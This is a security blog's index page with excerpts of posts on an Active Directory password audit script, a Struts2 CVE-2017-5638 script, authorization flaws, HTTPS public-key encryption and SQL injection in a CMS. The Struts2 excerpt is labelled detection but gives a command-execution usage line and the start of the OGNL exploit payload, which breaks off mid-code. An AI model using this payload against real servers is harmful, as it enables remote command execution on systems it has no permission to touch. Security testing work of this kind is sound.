BLOG

Active Directory Bad Password Account Audit Script (PowerShell)

Active Directory is widely used, regardless of the size of the company or organization, to control access to internal resources.However, there are still very few organizations that perform security assessments tailored to the specific characteristics of Active Directory services.Key focus areas for an Active Directory security assessment include the Domain Controller, Group Policy, user accounts,

Active Directory Bad Password Account Audit Script (PowerShell) 더 읽기"

Python Detection Script for the Struts2 Vulnerability (CVE-2017-5638 – Apache Struts2 S2-045) Actively Targeted from China

(*) Reference: https://github.com/rapid7/metasploit-framework/issues/8064 * usage: $python struts2_S2-045.py <URL> <CMD> $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action “ls -al” [ struts2_S2-045.py – Python Code ] #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = “%{(#_=’multipart/form-data’).” payload += “(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).” payload += “(#_memberAccess?” payload += “(#_memberAccess=#dm):” payload += “((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).” payload += “(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).” payload += “(#ognlUtil.getExcludedPackageNames().clear()).” payload +=

Python Detection Script for the Struts2 Vulnerability (CVE-2017-5638 – Apache Struts2 S2-045) Actively Targeted from China 더 읽기"

SERVICE – INADEQUATE PERMISSION VALIDATION

Vulnerability examples   Inadequate authorization checks gaps/weaknesses that allow unauthorized users to view, modify, or delete sensitive information without going through a valid authentication process when submitting a request to a website. For example, when you edit an article on an ad, the following HTTP request is sent. The website creates a unique profile for each

SERVICE – INADEQUATE PERMISSION VALIDATION 더 읽기"

ENCRYPTING SENSITIVE DATA WITH THE SERVER`S HTTPS PUBLIC KEY

   How to implement data encryption with the server’s public key on a website that provides HTTPS?     Occasionally, when diagnosing mock hacking on a mobile app or website, there are cases in which the data is encrypted with a random symmetric key method and transmitted to the server without encrypting the data using the

ENCRYPTING SENSITIVE DATA WITH THE SERVER`S HTTPS PUBLIC KEY 더 읽기"

SQL INJECTION IN CMS

Vulnerability Examples   SQL injection is an attack technique in which an attacker exploits security vulnerabilities toinject and execute arbitrary SQL statements, thereby manipulating the database to performabnormal operations. There are attack types such as Error SQL Injection, Blind SQLInjection, and Union based SQL Injection.    For example, in the code in the figure below, the

SQL INJECTION IN CMS 더 읽기"